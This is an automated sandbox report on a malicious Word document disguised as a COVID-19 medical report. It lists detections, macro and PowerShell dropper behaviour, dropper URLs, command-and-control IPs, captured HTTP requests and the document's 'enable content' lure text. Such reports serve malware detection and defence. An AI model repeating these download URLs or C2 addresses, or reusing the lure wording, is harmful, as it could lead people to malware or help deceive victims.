Analysis Report GT-9333 Medical report COVID-19.doc

Overview

General Information

Sample Name: GT-9333 Medical report COVID-19.doc
Analysis ID: 332936
MD5: a111ce91bd895c36fa2573483ddba7ef
SHA1: d4ef1a6f54d64ec0398fac3a2f3e2694d7ed8cb5
SHA256: f2ebfaec6ca0aeaf9fca020147398f74d7500b6be6259fc2eb4bb2e968e0cafe

Most interesting Screenshot:

Detection

Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
System process connects to network (likely due to code injection or exploit)
Creates processes via WMI
Document contains an embedded VBA with many GOTO operations indicating source code obfuscation
Encrypted powershell cmdline option found
Hides that the sample has been downloaded from the Internet (zone.identifier)
Machine Learning detection for dropped file
Potential dropper URLs found in powershell memory
PowerShell case anomaly found
Powershell drops PE file
Sigma detected: Suspicious Encoded PowerShell Command Line
Suspicious powershell command line found
Very long command line found
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Document contains an embedded VBA macro which executes code when the document is opened / closed
Document contains embedded VBA macros
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
Found evasive API chain (may stop execution after checking a module file name)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains strange resources
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

AV Detection:

barindex
Antivirus detection for URL or domain
Source: http://hotelshivansh.com/UserFiles/8/ Avira URL Cloud: Label: malware
Source: http://ownitconsignment.com/files/b/ Avira URL Cloud: Label: malware
Source: https://b2bcom.com.br/site/0H/ Avira URL Cloud: Label: malware
Multi AV Scanner detection for submitted file
Source: GT-9333 Medical report COVID-19.doc ReversingLabs: Detection: 25%
Machine Learning detection for dropped file
Source: C:\Users\user\F2nefq6\Prs2ndh\Chpieog.dll Joe Sandbox ML: detected

Cryptography:

barindex
Uses Microsoft's Enhanced Cryptographic Provider
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_002F93E4 CryptDecodeObjectEx, 8_2_002F93E4
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_002EA461 FindFirstFileW, 8_2_002EA461
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini Jump to behavior

Software Vulnerabilities:

barindex
Potential document exploit detected (performs DNS queries)
Source: global traffic DNS query: name: www.isatechnology.com
Potential document exploit detected (performs HTTP gets)
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 35.208.182.43:443
Potential document exploit detected (unknown TCP traffic)
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 35.208.182.43:443

Networking:

barindex
Potential dropper URLs found in powershell memory
Source: powershell.exe, 00000005.00000002.2119802005.0000000003A88000.00000004.00000001.sdmp String found in memory: http://arquivopop.com.br/index_htm_files/Kxh/
Source: powershell.exe, 00000005.00000002.2119802005.0000000003A88000.00000004.00000001.sdmp String found in memory: https://cairocad.com/cgi-bin/1PBB/
Source: powershell.exe, 00000005.00000002.2119802005.0000000003A88000.00000004.00000001.sdmp String found in memory: https://www.isatechnology.com/training/b/
Source: powershell.exe, 00000005.00000002.2119802005.0000000003A88000.00000004.00000001.sdmp String found in memory: http://hotelshivansh.com/UserFiles/8/
Source: powershell.exe, 00000005.00000002.2119802005.0000000003A88000.00000004.00000001.sdmp String found in memory: http://ownitconsignment.com/files/b/
Source: powershell.exe, 00000005.00000002.2119802005.0000000003A88000.00000004.00000001.sdmp String found in memory: https://b2bcom.com.br/site/0H/
Source: powershell.exe, 00000005.00000002.2119802005.0000000003A88000.00000004.00000001.sdmp String found in memory: http://transfersuvan.com/wp-admin/OVl/
Source: powershell.exe, 00000005.00000002.2119802005.0000000003A88000.00000004.00000001.sdmp String found in memory: https://physio-svdh.ch/wp-admin/kK/
Detected TCP or UDP traffic on non-standard ports
Source: global traffic TCP traffic: 192.168.2.22:49174 -> 50.116.111.59:8080
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /index_htm_files/Kxh/ HTTP/1.1Host: arquivopop.com.brConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /wp-admin/OVl/ HTTP/1.1Host: transfersuvan.comConnection: Keep-Alive
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 186.64.117.145 186.64.117.145
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: GOOGLE-2US GOOGLE-2US
Source: Joe Sandbox View ASN Name: TTNETTR TTNETTR
Source: Joe Sandbox View ASN Name: UNIFIEDLAYER-AS-1US UNIFIEDLAYER-AS-1US
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: POST /zikye087/k6io5sui3jj27i90cer/zipbonjrmr/ HTTP/1.1DNT: 0Referer: 50.116.111.59/zikye087/k6io5sui3jj27i90cer/zipbonjrmr/Content-Type: multipart/form-data; boundary=------------qm4wTQVJYgofUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 50.116.111.59:8080Content-Length: 8420Connection: Keep-AliveCache-Control: no-cache
Source: unknown TCP traffic detected without corresponding DNS query: 197.87.160.216
Source: unknown TCP traffic detected without corresponding DNS query: 197.87.160.216
Source: unknown TCP traffic detected without corresponding DNS query: 78.188.225.105
Source: unknown TCP traffic detected without corresponding DNS query: 78.188.225.105
Source: unknown TCP traffic detected without corresponding DNS query: 78.188.225.105
Source: unknown TCP traffic detected without corresponding DNS query: 78.188.225.105
Source: unknown TCP traffic detected without corresponding DNS query: 78.188.225.105
Source: unknown TCP traffic detected without corresponding DNS query: 78.188.225.105
Source: unknown TCP traffic detected without corresponding DNS query: 50.116.111.59
Source: unknown TCP traffic detected without corresponding DNS query: 50.116.111.59
Source: unknown TCP traffic detected without corresponding DNS query: 50.116.111.59
Source: unknown TCP traffic detected without corresponding DNS query: 50.116.111.59
Source: unknown TCP traffic detected without corresponding DNS query: 50.116.111.59
Source: unknown TCP traffic detected without corresponding DNS query: 50.116.111.59
Source: unknown TCP traffic detected without corresponding DNS query: 50.116.111.59
Source: unknown TCP traffic detected without corresponding DNS query: 50.116.111.59
Source: unknown TCP traffic detected without corresponding DNS query: 50.116.111.59
Source: unknown TCP traffic detected without corresponding DNS query: 50.116.111.59
Source: unknown TCP traffic detected without corresponding DNS query: 50.116.111.59
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_002E14E6 InternetReadFile, 8_2_002E14E6
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{78474F9B-DE8E-4300-98F0-AE5841A8170E}.tmp Jump to behavior
Source: global traffic HTTP traffic detected: GET /index_htm_files/Kxh/ HTTP/1.1Host: arquivopop.com.brConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /wp-admin/OVl/ HTTP/1.1Host: transfersuvan.comConnection: Keep-Alive
Source: rundll32.exe, 00000006.00000002.2118831975.0000000001C40000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2116184813.0000000002080000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2349678176.0000000002080000.00000002.00000001.sdmp String found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
Source: unknown DNS traffic detected: queries for: www.isatechnology.com
Source: unknown HTTP traffic detected: POST /zikye087/k6io5sui3jj27i90cer/zipbonjrmr/ HTTP/1.1DNT: 0Referer: 50.116.111.59/zikye087/k6io5sui3jj27i90cer/zipbonjrmr/Content-Type: multipart/form-data; boundary=------------qm4wTQVJYgofUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 50.116.111.59:8080Content-Length: 8420Connection: Keep-AliveCache-Control: no-cache
Source: powershell.exe, 00000005.00000002.2116517300.0000000002F12000.00000004.00000001.sdmp String found in binary or memory: http://arquivopop.com.br
Source: powershell.exe, 00000005.00000002.2119802005.0000000003A88000.00000004.00000001.sdmp String found in binary or memory: http://arquivopop.com.br/index_htm_files/Kxh/
Source: powershell.exe, 00000005.00000002.2119802005.0000000003A88000.00000004.00000001.sdmp String found in binary or memory: http://hotelshivansh.com/UserFiles/8/
Source: rundll32.exe, 00000006.00000002.2118831975.0000000001C40000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2116184813.0000000002080000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2349678176.0000000002080000.00000002.00000001.sdmp String found in binary or memory: http://investor.msn.com
Source: rundll32.exe, 00000006.00000002.2118831975.0000000001C40000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2116184813.0000000002080000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2349678176.0000000002080000.00000002.00000001.sdmp String found in binary or memory: http://investor.msn.com/
Source: rundll32.exe, 00000006.00000002.2119754423.0000000001E27000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2116386799.0000000002267000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2349870835.0000000002267000.00000002.00000001.sdmp String found in binary or memory: http://localizability/practices/XML.asp
Source: rundll32.exe, 00000006.00000002.2119754423.0000000001E27000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2116386799.0000000002267000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2349870835.0000000002267000.00000002.00000001.sdmp String found in binary or memory: http://localizability/practices/XMLConfiguration.asp
Source: powershell.exe, 00000005.00000002.2119802005.0000000003A88000.00000004.00000001.sdmp String found in binary or memory: http://ownitconsignment.com/files/b/
Source: powershell.exe, 00000005.00000002.2113047862.00000000022F0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2117091810.0000000002960000.00000002.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: rundll32.exe, 00000006.00000002.2119754423.0000000001E27000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2116386799.0000000002267000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2349870835.0000000002267000.00000002.00000001.sdmp String found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
Source: powershell.exe, 00000005.00000002.2116801238.00000000031E1000.00000004.00000001.sdmp String found in binary or memory: http://transfersuvan.com
Source: powershell.exe, 00000005.00000002.2119802005.0000000003A88000.00000004.00000001.sdmp String found in binary or memory: http://transfersuvan.com/wp-admin/OVl/
Source: rundll32.exe, 00000006.00000002.2119754423.0000000001E27000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2116386799.0000000002267000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2349870835.0000000002267000.00000002.00000001.sdmp String found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
Source: powershell.exe, 00000005.00000002.2113047862.00000000022F0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2117091810.0000000002960000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2350370536.0000000002FD0000.00000002.00000001.sdmp String found in binary or memory: http://www.%s.comPA
Source: rundll32.exe, 00000006.00000002.2118831975.0000000001C40000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2116184813.0000000002080000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2349678176.0000000002080000.00000002.00000001.sdmp String found in binary or memory: http://www.hotmail.com/oe
Source: rundll32.exe, 00000006.00000002.2119754423.0000000001E27000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2116386799.0000000002267000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2349870835.0000000002267000.00000002.00000001.sdmp String found in binary or memory: http://www.icra.org/vocabulary/.
Source: rundll32.exe, 00000006.00000002.2118831975.0000000001C40000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2116184813.0000000002080000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2349678176.0000000002080000.00000002.00000001.sdmp String found in binary or memory: http://www.msnbc.com/news/ticker.txt
Source: powershell.exe, 00000005.00000002.2110407873.0000000000114000.00000004.00000020.sdmp String found in binary or memory: http://www.piriform.com/ccleaner
Source: powershell.exe, 00000005.00000002.2110407873.0000000000114000.00000004.00000020.sdmp String found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
Source: rundll32.exe, 00000008.00000002.2349678176.0000000002080000.00000002.00000001.sdmp String found in binary or memory: http://www.windows.com/pctv.
Source: powershell.exe, 00000005.00000002.2119802005.0000000003A88000.00000004.00000001.sdmp String found in binary or memory: https://b2bcom.com.br/site/0H/
Source: powershell.exe, 00000005.00000002.2119802005.0000000003A88000.00000004.00000001.sdmp String found in binary or memory: https://cairocad.com/cgi-bin/1PBB/
Source: powershell.exe, 00000005.00000002.2119802005.0000000003A88000.00000004.00000001.sdmp String found in binary or memory: https://physio-svdh.ch/wp-admin/kK/
Source: powershell.exe, 00000005.00000002.2116517300.0000000002F12000.00000004.00000001.sdmp String found in binary or memory: https://physio-svdh.ch/wp-admin/kK/P
Source: powershell.exe, 00000005.00000002.2119802005.0000000003A88000.00000004.00000001.sdmp String found in binary or memory: https://www.isatechnology.com
Source: powershell.exe, 00000005.00000002.2119802005.0000000003A88000.00000004.00000001.sdmp, powershell.exe, 00000005.00000002.2120753014.000000001B5AE000.00000004.00000001.sdmp String found in binary or memory: https://www.isatechnology.com/training/b/
Source: powershell.exe, 00000005.00000002.2120027489.0000000003C53000.00000004.00000001.sdmp String found in binary or memory: https://www.isatechnology.comp
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49168
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49167
Source: unknown Network traffic detected: HTTP traffic on port 49168 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49167 -> 443

System Summary:

barindex
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Source: Screenshot number: 4 Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document. 0 Page, I of I Words:
Source: Screenshot number: 4 Screenshot OCR: DOCUMENT IS PROTECTED. I Previewing is not available for protected documents. You have to press "E
Source: Screenshot number: 4 Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
Source: Screenshot number: 4 Screenshot OCR: ENABLE CONTENT" buttons to preview this document. 0 Page, I of I Words: 0 N@m 13 ;a 10096 G)
Source: Screenshot number: 8 Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document. K . . . . O
Source: Screenshot number: 8 Screenshot OCR: DOCUMENT IS PROTECTED. Previewing is not available for protected documents. You have to press "ENA
Source: Screenshot number: 8 Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
Source: Screenshot number: 8 Screenshot OCR: ENABLE CONTENT" buttons to preview this document. K . . . . O
Source: Document image extraction number: 0 Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document.
Source: Document image extraction number: 0 Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
Source: Document image extraction number: 0 Screenshot OCR: ENABLE CONTENT" buttons to preview this document.
Source: Document image extraction number: 1 Screenshot OCR: ENABLE EDITING" and "ENABLE CONTENT" buttons to preview this document.
Source: Document image extraction number: 1 Screenshot OCR: DOCUMENT IS PROTECTED. Previewing is not available for protected documents. You have to press "ENA
Source: Document image extraction number: 1 Screenshot OCR: protected documents. You have to press "ENABLE EDITING" and "ENABLE CONTENT" buttons to preview thi
Source: Document image extraction number: 1 Screenshot OCR: ENABLE CONTENT" buttons to preview this document.
Powershell drops PE file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\F2nefq6\Prs2ndh\Chpieog.dll Jump to dropped file
Very long command line found
Source: unknown Process created: Commandline size = 7856
Source: unknown Process created: Commandline size = 7765
Source: C:\Windows\System32\cmd.exe Process created: Commandline size = 7765 Jump to behavior
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76E20000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76D20000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76E20000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76D20000 page execute and read and write Jump to behavior
Creates files inside the system directory
Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Windows\SysWOW64\Hnzj\ Jump to behavior
Detected potential crypto function
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_10004747 7_2_10004747
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0020E800 7_2_0020E800
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00213A9F 7_2_00213A9F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0020ECCD 7_2_0020ECCD
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00211108 7_2_00211108
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00214572 7_2_00214572
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_002087AA 7_2_002087AA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00211D81 7_2_00211D81
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0020E1E9 7_2_0020E1E9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0020AFF9 7_2_0020AFF9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_002045F9 7_2_002045F9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00217FCC 7_2_00217FCC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00218225 7_2_00218225
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0020CA31 7_2_0020CA31
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00212433 7_2_00212433
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00209E02 7_2_00209E02
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00210609 7_2_00210609
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00219A13 7_2_00219A13
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00206212 7_2_00206212
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00201013 7_2_00201013
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0020241B 7_2_0020241B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00201673 7_2_00201673
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00216C51 7_2_00216C51
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0020AEA0 7_2_0020AEA0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0020A8AE 7_2_0020A8AE
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0021A0B0 7_2_0021A0B0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_002132B2 7_2_002132B2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_002114BB 7_2_002114BB
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00210E90 7_2_00210E90
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00219494 7_2_00219494
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0021A29B 7_2_0021A29B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_002050E1 7_2_002050E1
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_002176E8 7_2_002176E8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0020D4F6 7_2_0020D4F6
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_002188C2 7_2_002188C2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0020EEC4 7_2_0020EEC4
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00211AD1 7_2_00211AD1
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00219CD7 7_2_00219CD7
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00202CDA 7_2_00202CDA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00205EDF 7_2_00205EDF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0020FD22 7_2_0020FD22
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00215D25 7_2_00215D25
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0020EB26 7_2_0020EB26
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00204B26 7_2_00204B26
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00204D3C 7_2_00204D3C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0020F908 7_2_0020F908
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00206509 7_2_00206509
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0021410D 7_2_0021410D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00203F0E 7_2_00203F0E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0020A711 7_2_0020A711
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00205B1F 7_2_00205B1F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0020DB62 7_2_0020DB62
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00212766 7_2_00212766
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0020196F 7_2_0020196F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00201577 7_2_00201577
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00206F7B 7_2_00206F7B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0021915E 7_2_0021915E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0020B5A9 7_2_0020B5A9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_002093AD 7_2_002093AD
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_002115AF 7_2_002115AF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_002121B0 7_2_002121B0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0020B7BC 7_2_0020B7BC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0020BF80 7_2_0020BF80
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00210B86 7_2_00210B86
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00204390 7_2_00204390
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0020C19E 7_2_0020C19E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00208FE5 7_2_00208FE5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_002071EC 7_2_002071EC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0020F1ED 7_2_0020F1ED
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_002083F0 7_2_002083F0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00201BF7 7_2_00201BF7
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0020CDF7 7_2_0020CDF7
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00202FF8 7_2_00202FF8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0020C3FE 7_2_0020C3FE
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_002143CB 7_2_002143CB
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0020D7D7 7_2_0020D7D7
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_002097DE 7_2_002097DE
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_002F0609 8_2_002F0609
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_002E241B 8_2_002E241B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_002F9A13 8_2_002F9A13
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_002F32B2 8_2_002F32B2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_002FA0B0 8_2_002FA0B0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_002F3A9F 8_2_002F3A9F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_002F76E8 8_2_002F76E8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_002E50E1 8_2_002E50E1
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_002ED4F6 8_2_002ED4F6
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_002EECCD 8_2_002EECCD
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_002F9CD7 8_2_002F9CD7
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_002F5D25 8_2_002F5D25
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_002E4D3C 8_2_002E4D3C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_002E5B1F 8_2_002E5B1F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_002EA711 8_2_002EA711
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_002F2766 8_2_002F2766
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_002EDB62 8_2_002EDB62
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_002E1577 8_2_002E1577
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_002F4572 8_2_002F4572
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_002EB5A9 8_2_002EB5A9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_002F1D81 8_2_002F1D81
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_002EC19E 8_2_002EC19E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_002E2FF8 8_2_002E2FF8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_002F43CB 8_2_002F43CB
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_002F8225 8_2_002F8225
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_002F2433 8_2_002F2433
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_002ECA31 8_2_002ECA31
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_002E9E02 8_2_002E9E02
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_002EE800 8_2_002EE800
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_002E6212 8_2_002E6212
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_002E1013 8_2_002E1013
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_002E1673 8_2_002E1673
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_002F6C51 8_2_002F6C51
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_002EA8AE 8_2_002EA8AE
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_002EAEA0 8_2_002EAEA0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_002F14BB 8_2_002F14BB
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_002FA29B 8_2_002FA29B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_002F9494 8_2_002F9494
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_002F0E90 8_2_002F0E90
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_002EEEC4 8_2_002EEEC4
